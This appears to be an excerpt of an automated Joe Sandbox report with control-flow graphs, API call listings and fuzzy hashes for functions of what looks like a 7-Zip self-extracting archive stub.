                                                                control_flow_graph 1177 416891-4168ae call 413b40 1180 4168b4-4168bb call 4163a6 1177->1180 1181 4169e6-4169e9 1177->1181 1184 4168c4-4168f3 call 40b2b0 memcpy 1180->1184 1185 4168bd-4168bf 1180->1185 1188 4168f6-4168fe 1184->1188 1185->1181 1189 416900-41690e 1188->1189 1190 416916-41692e 1188->1190 1191 416910 1189->1191 1192 41698a-416993 ??3@YAXPAX@Z 1189->1192 1196 416930-416935 1190->1196 1197 416995 1190->1197 1191->1190 1193 416912-416914 1191->1193 1194 4169e4-4169e5 1192->1194 1193->1190 1193->1192 1194->1181 1199 416937-41693f 1196->1199 1200 41699a-41699d 1196->1200 1198 416997-416998 1197->1198 1201 4169dd-4169e2 ??3@YAXPAX@Z 1198->1201 1202 416941 1199->1202 1203 416973-416985 memmove 1199->1203 1200->1198 1201->1194 1204 416950-416954 1202->1204 1203->1188 1205 416956-416958 1204->1205 1206 416948-41694a 1204->1206 1205->1203 1207 41695a-416963 call 4163a6 1205->1207 1206->1203 1208 41694c-41694d 1206->1208 1211 416965-416971 1207->1211 1212 41699f-4169d5 memcpy call 412a6a 1207->1212 1208->1204 1211->1203 1213 416943-416946 1211->1213 1214 4169d8-4169db 1212->1214 1213->1204 1214->1201
                                                                APIs
                                                                • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 004168E8
                                                                • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 0041697F
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0041698B
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@memcpymemmove
                                                                • String ID:
                                                                • API String ID: 3549172513-0
                                                                • Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                • Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
                                                                • Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                • Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1229 404d0b-404d8c #17 call 418f40 call 402427 call 40247d * 7 1248 404d91-404da5 SHGetSpecialFolderPathW 1229->1248 1249 404e3a-404e3e 1248->1249 1250 404dab-404df5 wsprintfW call 4014eb * 2 call 401403 * 2 call 4035cf 1248->1250 1249->1248 1252 404e44-404e48 1249->1252 1261 404dfa-404e00 1250->1261 1262 404e02-404e25 call 401403 * 2 call 4035cf 1261->1262 1263 404e2a-404e30 1261->1263 1262->1263 1263->1261 1265 404e32-404e35 call 402990 1263->1265 1265->1249
                                                                APIs
                                                                • #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                  • Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                  • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                  • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(0051A408,?), ref: 00402541
                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(0051A408), ref: 00402551
                                                                  • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                  • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                  • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                  • Part of subcall function 0040247D: _wtol.MSVCRT ref: 0040260A
                                                                  • Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,0051A408,00000002), ref: 0040262A
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                • wsprintfW.USER32 ref: 00404DB8
                                                                  • Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                • String ID: 7zSfxFolder%02d
                                                                • API String ID: 3387708999-2820892521
                                                                • Opcode ID: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                • Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
                                                                • Opcode Fuzzy Hash: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                • Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1271 40b2b0-40b2bb 1272 40b300-40b302 1271->1272 1273 40b2bd-40b2c0 1271->1273 1274 40b2c2-40b2d2 ??2@YAPAXI@Z 1273->1274 1275 40b2eb 1273->1275 1276 40b2d4-40b2d6 1274->1276 1277 40b2ed-40b2ff ??3@YAXPAX@Z 1274->1277 1275->1277 1278 40b2d8 1276->1278 1279 40b2da-40b2e9 memmove 1276->1279 1277->1272 1278->1279 1279->1277
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2C3
                                                                • memmove.MSVCRT(00000000,?,?), ref: 0040B2E0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2F1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@memmove
                                                                • String ID: hA
                                                                • API String ID: 3828600508-1221461045
                                                                • Opcode ID: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                • Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
                                                                • Opcode Fuzzy Hash: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                • Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1280 402ee4-402f2e call 4192c0 call 412a6a lstrlenA * 2 1284 402f33-402f4f call 412a36 1280->1284 1286 402f55-402f5a 1284->1286 1287 40301f 1284->1287 1286->1287 1288 402f60-402f6a 1286->1288 1289 403021-403025 1287->1289 1290 402f6d-402f72 1288->1290 1291 402fb1-402fb6 1290->1291 1292 402f74-402f79 1290->1292 1293 402fb8-402fcb memcmp 1291->1293 1294 402fdb-402fff memmove 1291->1294 1292->1294 1295 402f7b-402f8e memcmp 1292->1295 1296 402fab-402faf 1293->1296 1297 402fcd-402fd9 1293->1297 1298 403001-403008 1294->1298 1299 40300e-403019 1294->1299 1300 402f94-402f9e 1295->1300 1301 40301b-40301d 1295->1301 1296->1290 1297->1290 1298->1299 1302 402f30 1298->1302 1299->1289 1300->1287 1303 402fa0-402fa6 call 402c21 1300->1303 1301->1289 1302->1284 1303->1296
                                                                APIs
                                                                • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
                                                                • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
                                                                • memcmp.MSVCRT(00000000,?,?), ref: 00402F84
                                                                • memcmp.MSVCRT(00000000,?,?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FC1
                                                                • memmove.MSVCRT(?,?,00000000,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FF3
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: lstrlenmemcmp$memmove
                                                                • String ID:
                                                                • API String ID: 3251180759-0
                                                                • Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                • Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
                                                                • Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                • Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1307 4019d2-4019e9 ??2@YAPAXI@Z 1308 4019f4 1307->1308 1309 4019eb-4019f2 call 41616a 1307->1309 1311 4019f6-401a1f call 41334e call 412a6a 1308->1311 1309->1311 1317 401a90 1311->1317 1318 401a21-401a2b ??2@YAPAXI@Z 1311->1318 1319 401a93-401aaa call 409606 1317->1319 1320 401a46 1318->1320 1321 401a2d-401a44 1318->1321 1326 401aab-401ab0 1319->1326 1323 401a48-401a5f call 40113f 1320->1323 1321->1323 1323->1319 1330 401a61-401a6b 1323->1330 1328 401ab2-401ab4 1326->1328 1329 401ab8-401aba 1326->1329 1328->1329 1331 401ac2-401ac7 1329->1331 1332 401abc-401abe 1329->1332 1333 401a79-401a83 ??2@YAPAXI@Z 1330->1333 1334 401a6d-401a6f call 4039e7 1330->1334 1336 401afc-401b00 1331->1336 1332->1331 1337 401a85-401a8e call 4016d4 1333->1337 1338 401ac9 1333->1338 1339 401a74-401a77 1334->1339 1340 401acb-401adc call 4015d8 call 401880 1337->1340 1338->1340 1339->1326 1339->1333 1346 401ae1-401ae8 1340->1346 1347 401af0-401af2 1346->1347 1348 401aea-401aec 1346->1348 1349 401af4-401af6 1347->1349 1350 401afa 1347->1350 1348->1347 1349->1350 1350->1336
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,0041E9E8,ExecuteFile,00000028,00000028,?,00406D79,?,0041E9E8,0041E9E8), ref: 004019DF
                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00401A23
                                                                • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 00401A7B
                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
                                                                • String ID: ExecuteFile
                                                                • API String ID: 1592922708-323923146
                                                                • Opcode ID: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                • Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
                                                                • Opcode Fuzzy Hash: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                • Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1352 401880-4018d6 call 4136b9 call 401403 call 401795 CreateThread 1359 4018d8 call 408caa 1352->1359 1360 4018dd-4018f8 WaitForSingleObject 1352->1360 1359->1360 1361 4018fa-4018fd 1360->1361 1362 40192c-401932 1360->1362 1364 401920 1361->1364 1365 4018ff-401902 1361->1365 1366 401990 1362->1366 1367 401934-401949 GetExitCodeThread 1362->1367 1370 401922-40192a call 409606 1364->1370 1368 401904-401907 1365->1368 1369 40191c-40191e 1365->1369 1371 401995-401998 1366->1371 1372 401953-40195e 1367->1372 1373 40194b-40194d 1367->1373 1376 401918-40191a 1368->1376 1377 401909-40190c 1368->1377 1369->1370 1370->1366 1374 401960-401961 1372->1374 1375 401966-40196f 1372->1375 1373->1372 1379 40194f-401951 1373->1379 1380 401963-401964 1374->1380 1381 401971-401978 1375->1381 1382 40197a-401986 SetLastError 1375->1382 1376->1370 1383 401913-401916 1377->1383 1384 40190e-401911 1377->1384 1379->1371 1386 401988-40198d call 409606 1380->1386 1381->1366 1381->1382 1382->1386 1383->1380 1384->1366 1384->1383 1386->1366
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5
                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                • String ID:
                                                                • API String ID: 359084233-0
                                                                • Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                • Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
                                                                • Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                • Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1389 414dcf-414e17 _EH_prolog call 41334e 1392 414e19-414e1c 1389->1392 1393 414e1f-414e22 1389->1393 1392->1393 1394 414e24-414e29 1393->1394 1395 414e38-414e5d 1393->1395 1396 414e31-414e33 1394->1396 1397 414e2b-414e2d 1394->1397 1398 414e5f-414e65 1395->1398 1399 4152ea-4152fb 1396->1399 1397->1396 1400 414e6b-414e6f 1398->1400 1401 414f2f-414f42 call 40122a 1398->1401 1402 414e71-414e74 1400->1402 1403 414e77-414e86 1400->1403 1409 414f44-414f54 call 414b2d 1401->1409 1410 414f59-414f7e call 414333 ??2@YAPAXI@Z 1401->1410 1402->1403 1405 414e88-414e9e call 414be8 call 414da5 call 412885 1403->1405 1406 414eab-414eb0 1403->1406 1425 414ea3-414ea9 1405->1425 1407 414eb2-414ebc 1406->1407 1408 414ebe-414ef8 call 414be8 call 414da5 call 412885 call 414cbf 1406->1408 1407->1408 1412 414efb-414f11 1407->1412 1408->1412 1409->1399 1423 414f80-414f87 call 4137b3 1410->1423 1424 414f89-414fa2 call 41334e call 4136e0 1410->1424 1420 414f14-414f1c 1412->1420 1420->1425 1426 414f1e-414f2d call 414b0b 1420->1426 1423->1424 1442 414fa5-414fc8 call 4136ae 1424->1442 1425->1398 1426->1420 1446 414fca-414fcf 1442->1446 1447 414ffe-415001 1442->1447 1450 414fd1-414fd3 1446->1450 1451 414fd7-414fef call 414c38 call 414b2d 1446->1451 1448 415003-415008 1447->1448 1449 41502d-415051 ??2@YAPAXI@Z 1447->1449 1452 415010-415026 call 414c38 call 414b2d 1448->1452 1453 41500a-41500c 1448->1453 1454 415053-41505a call 415346 1449->1454 1455 41505c 1449->1455 1450->1451 1468 414ff1-414ff3 1451->1468 1469 414ff7-414ff9 1451->1469 1452->1449 1453->1452 1460 41505e-415075 call 41334e 1454->1460 1455->1460 1470 415083-4150a8 call 4156e6 1460->1470 1471 415077-415080 1460->1471 1468->1469 1469->1399 1475 4150eb-4150ee 1470->1475 1476 4150aa-4150af 1470->1476 1471->1470 1477 4152a5-4152aa 1475->1477 1478 4150f4-415132 call 414d0b call 414bb9 1475->1478 1479 4150b1-4150b3 1476->1479 1480 4150b7-4150bc 1476->1480 1482 4152b2-4152d6 1477->1482 1483 4152ac-4152ad 1477->1483 1493 415145-415175 call 414491 1478->1493 1494 415134-415142 1478->1494 1479->1480 1484 4150c4-4150dc call 414c38 call 414b2d 1480->1484 1485 4150be-4150c0 1480->1485 1482->1399 1482->1442 1483->1482 1495 4150e4-4150e6 1484->1495 1496 4150de-4150e0 1484->1496 1485->1484 1498 41517a-41517f 1493->1498 1494->1493 1495->1399 1496->1495 1499 415181 1498->1499 1500 4151cc-4151d2 1498->1500 1501 415184-415186 1499->1501 1502 4151d4-4151d6 1500->1502 1503 4151e9-4151eb 1500->1503 1504 4151d9-4151e5 call 415693 1501->1504 1502->1504 1505 4151f2-4151fe 1503->1505 1506 4151ed-4151f0 1503->1506 1508 415188-41518a 1504->1508 1517 4151e7 1504->1517 1505->1501 1509 415200-415209 1505->1509 1506->1508 1510 415192-415194 1508->1510 1511 41518c-41518d 1508->1511 1513 415211-415213 1509->1513 1514 41520b-41520d 1509->1514 1515 415196-415198 1510->1515 1516 41519c-41519e 1510->1516 1511->1510 1513->1482 1518 415219-41521f 1513->1518 1514->1513 1515->1516 1516->1484 1519 4151a4-4151aa 1516->1519 1522 4151b3-4151b5 1517->1522 1523 4151b9-4151bb 1517->1523 1518->1477 1518->1482 1519->1484 1522->1523 1525 4151c3-4151c7 1523->1525 1526 4151bd-4151bf 1523->1526 1525->1482 1526->1525
                                                                APIs
                                                                • _EH_prolog.MSVCRT ref: 00414DD8
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 00414F76
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 00415049
                                                                  • Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0041505A,00000000,00000001), ref: 0041536E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@$H_prolog
                                                                • String ID:
                                                                • API String ID: 3431946709-0
                                                                • Opcode ID: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                • Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
                                                                • Opcode Fuzzy Hash: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                • Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98
                                                                APIs
                                                                  • Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                  • Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                  • Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                • ??3@YAXPAX@Z.MSVCRT(0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404117
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 0040411F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404127
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                • String ID:
                                                                • API String ID: 1642057587-0
                                                                • Opcode ID: dc175487ef40364bcc757993a9980485560a2292d3fee742de20c5e66277a851
                                                                • Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
                                                                • Opcode Fuzzy Hash: dc175487ef40364bcc757993a9980485560a2292d3fee742de20c5e66277a851
                                                                • Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59
                                                                APIs
                                                                • _EH_prolog.MSVCRT ref: 00415EEF
                                                                  • Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415F9F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415FDE
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@H_prolog
                                                                • String ID:
                                                                • API String ID: 1329742358-0
                                                                • Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                • Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
                                                                • Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
